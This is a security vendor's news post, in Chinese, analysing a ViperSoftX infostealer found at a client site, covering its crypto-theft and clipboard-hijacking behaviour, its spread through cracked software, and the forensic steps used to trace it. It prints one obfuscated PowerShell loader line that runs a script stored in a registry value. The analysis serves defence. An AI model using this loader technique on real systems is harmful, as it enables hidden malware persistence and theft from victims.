公司新聞

聚銘AISOC對(duì)ViperSoftX信息竊取軟件的一次發(fā)現(xiàn)、驗(yàn)證和阻斷處理

來(lái)源:聚銘網(wǎng)絡(luò)    發(fā)布時(shí)間:2023-06-28    瀏覽次數(shù):
 

聚銘網(wǎng)絡(luò)近期在一次對(duì)用戶的現(xiàn)場(chǎng)安全運(yùn)維過(guò)程中,利用聚銘下一代智慧安全運(yùn)營(yíng)中心(AISOC)監(jiān)測(cè)到了若干惡意域名請(qǐng)求的異常行為。經(jīng)取證后發(fā)現(xiàn),該惡意軟件名為ViperSoftX,具有多種混合惡意行為。聚銘網(wǎng)絡(luò)相關(guān)產(chǎn)品報(bào)警如下:


圖1 惡意域名響應(yīng)請(qǐng)求報(bào)警



圖2 惡意域名請(qǐng)求列表


經(jīng)過(guò)查詢后,可以看到此類域名已經(jīng)被標(biāo)注為惡意,下圖是其中一個(gè)域名的相關(guān)情報(bào):


圖3 惡意域名情報(bào)信息




什么是ViperSoftX


ViperSoftX是一種信息竊取軟件,主要功能為竊取加密貨幣、剪貼板,對(duì)受感染的機(jī)器進(jìn)行指紋識(shí)別,以及下載和執(zhí)行任意附加的攻擊載荷或命令。ViperSoftX分發(fā)的一個(gè)有效載荷為特定的信息竊取器,其形式是基于Chromium的瀏覽器擴(kuò)展。該惡意擴(kuò)展通過(guò)獲取受害者所訪問(wèn)頁(yè)面的完全控制權(quán)限,利用瀏覽器中間人攻擊(MITB)來(lái)篡改加密貨幣交易所上的API請(qǐng)求數(shù)據(jù),從而控制加密貨幣交易。

此外,ViperSoftX還可以竊取受害者的剪貼板內(nèi)容,篡改訪問(wèn)網(wǎng)站上的加密地址,使用MQTT向C&C服務(wù)器報(bào)告事件等。ViperSoftX主要通過(guò)Adobe Illustrator、Corel Video Studio、Microsoft Office等破解軟件進(jìn)行傳播。

ViperSoftX的攻擊鏈可以總結(jié)為以下流程:


圖4 ViperSoftX的攻擊鏈?zhǔn)疽?/strong>



取證過(guò)程


在了解了整個(gè)攻擊過(guò)程后,通過(guò)聚銘下一代智慧安全運(yùn)營(yíng)中心(AISOC)的取證工具就可以比較輕松地掌握是哪個(gè)進(jìn)程執(zhí)行了這些域名請(qǐng)求。通過(guò)運(yùn)行取證工具,可以明顯地看到一個(gè)Powershell腳本正在執(zhí)行,如下圖所示:


圖5 腳本執(zhí)行命令截圖(通過(guò)取證工具獲?。?/span>


可以看出,這個(gè)PS腳本位于“C:\Windows\System32\”路徑下,打開(kāi)它能看到如下內(nèi)容:

$hWoZcYCHbzD=[ScriptBlock];$OYjdrEDOZG=[string];$QSIVJlVifNVF=[char]; icm ($hWoZcYCHbzD::Create($OYjdrEDOZG::Join('', ((gp 'HKLM:\SOFTWARE\Khronos8OjteuI').'1NpPEtPF' | % { [char]$_ }))))

很明顯,這個(gè)PowerShell執(zhí)行的真正內(nèi)容在“HKLM:\SOFTWARE\Khronos8OjteuI”中,如下圖所示:


圖6 被植入在注冊(cè)表中的惡意程序腳本


可以看出受攻擊機(jī)器的注冊(cè)表信息已經(jīng)被惡意修改,通過(guò)解碼被寫入注冊(cè)表的內(nèi)容后,獲取到完整的惡意程序,其中關(guān)鍵部分如下:


圖7 請(qǐng)求惡意域名部分


這里使用了一個(gè)三重循環(huán),故最多可以變換出50個(gè)不同的域名(即2*5*5),以躲避相關(guān)安全設(shè)備的檢測(cè),但由于其使用的還是有限的域名池,因此在聚銘相關(guān)專業(yè)設(shè)備的幫助下能夠較為容易地偵測(cè)出來(lái)。



結(jié)論


聚銘網(wǎng)絡(luò)技術(shù)人員在現(xiàn)場(chǎng)取證的過(guò)程中了解到,客戶被攻擊主機(jī)其實(shí)安裝了多種殺毒軟件,但在執(zhí)行查殺時(shí)沒(méi)有發(fā)現(xiàn)任何報(bào)警,通過(guò)這一點(diǎn)可以充分說(shuō)明ViperSoftX具有很強(qiáng)地隱蔽性(將其主要惡意部分放入了注冊(cè)表值),一般的防護(hù)手段難以及時(shí)發(fā)現(xiàn)。

目前還未準(zhǔn)確查明用戶是如何被植入ViperSoftX的,但通過(guò)對(duì)其執(zhí)行鏈的分析,推測(cè)可能是用戶在上網(wǎng)時(shí)下載了包含惡意內(nèi)容的軟件,從而使主機(jī)受到感染。因此小銘哥提醒大家,在上網(wǎng)時(shí)要切記網(wǎng)絡(luò)安全,請(qǐng)勿下載盜版軟件,避免因一時(shí)疏忽成為黑客攻擊的受害者。

 
 

上一篇:2023年6月27日聚銘安全速遞

下一篇:案例精選|聚銘網(wǎng)絡(luò)助力中國(guó)生物武岡血漿站筑牢網(wǎng)絡(luò)安全防線